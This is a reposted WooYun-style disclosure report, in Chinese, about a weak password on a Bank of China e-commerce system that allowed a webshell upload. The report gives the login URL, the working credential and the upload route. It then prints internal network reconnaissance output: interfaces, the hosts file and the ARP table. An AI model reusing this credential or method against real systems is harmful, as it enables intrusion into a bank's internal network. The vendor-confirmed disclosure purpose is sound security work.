中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-01: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

详细说明:

#1 发现方法

利用通用的弱口令检测脚本,简单而又高效且杀伤力巨大

http://zone.wooyun.org/content/22529

http://zone.wooyun.org/content/21962

中国姓名排行TOP500(数据统计来自国家人口数据库)

http://zone.wooyun.org/content/18372

#2 漏洞描述

https://e.boc.cn/ehome/property/frame/sign.do

发现1个弱口令:wangwei:000000

社区管理功能,添加附件,即可获得shell

fujian.png



漏洞证明:

https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp

webshell.jpg





code 区域
[/]$ /sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:72:2C
inet addr:21.123.47.151 Bcast:21.123.47.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:127879201 errors:0 dropped:0 overruns:0 frame:0
TX packets:117334178 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22666975632 (21.1 GiB) TX bytes:32615347620 (30.3 GiB)

eth1 Link encap:Ethernet HWaddr 00:50:56:9A:14:C4
inet addr:10.123.47.151 Bcast:10.123.47.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:51273711 errors:0 dropped:0 overruns:0 frame:0
TX packets:46856648 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:12233542012 (11.3 GiB) TX bytes:9912431273 (9.2 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:238664440 errors:0 dropped:0 overruns:0 frame:0
TX packets:238664440 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24040429146 (22.3 GiB) TX bytes:24040429146 (22.3 GiB)



[/]$ cat /etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
21.123.47.146 P1EZECAP01
21.123.47.147 P1EZECAP02
21.123.47.148 P1EZECAP03
21.123.47.149 P1EZECAP04
21.123.47.150 P1EZECAP05
21.123.47.151 P1EZECAP06
21.123.47.152 P1EZECAP07
21.123.47.153 P1EZECAP08
10.123.47.146 P1EZECAP01_gpfs
10.123.47.147 P1EZECAP02_gpfs
10.123.47.148 P1EZECAP03_gpfs
10.123.47.149 P1EZECAP04_gpfs
10.123.47.150 P1EZECAP05_gpfs
10.123.47.151 P1EZECAP06_gpfs
10.123.47.152 P1EZECAP07_gpfs
10.123.47.153 P1EZECAP08_gpfs
21.122.32.116 ZabbixServer
21.123.102.88 nbu3media1
21.123.102.89 nbu3media2
21.123.102.90 nbu3master


[/]$ /sbin/arp -a
? (21.123.47.161) at 00:50:56:9a:3d:95 [ether] on eth0
P1EZECAP05 (21.123.47.150) at 00:50:56:9a:00:55 [ether] on eth0
? (21.123.47.1) at 00:00:0c:9f:f0:2f [ether] on eth0
P1EZECAP01_gpfs (10.123.47.146) at 00:50:56:9a:62:66 [ether] on eth1
P1EZECAP05_gpfs (10.123.47.150) at 00:50:56:9a:79:c7 [ether] on eth1
P1EZECAP03_gpfs (10.123.47.148) at 00:50:56:9a:31:0c [ether] on eth1
P1EZECAP04_gpfs (10.123.47.149) at 00:50:56:9a:6f:8f [ether] on eth1
P1EZECAP07 (21.123.47.152) at 00:50:56:9a:49:62 [ether] on eth0
P1EZECAP08_gpfs (10.123.47.153) at 00:50:56:9a:7b:08 [ether] on eth1
P1EZECAP07_gpfs (10.123.47.152) at 00:50:56:9a:05:f1 [ether] on eth1
P1EZECAP02_gpfs (10.123.47.147) at 00:50:56:9a:56:89 [ether] on eth1


[/]$

 

修复方案:

补弱口令,补上传漏洞

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-04 20:50

厂商回复:

感谢白帽子

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网) - https://www.15qq.cn/wooyun/725.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知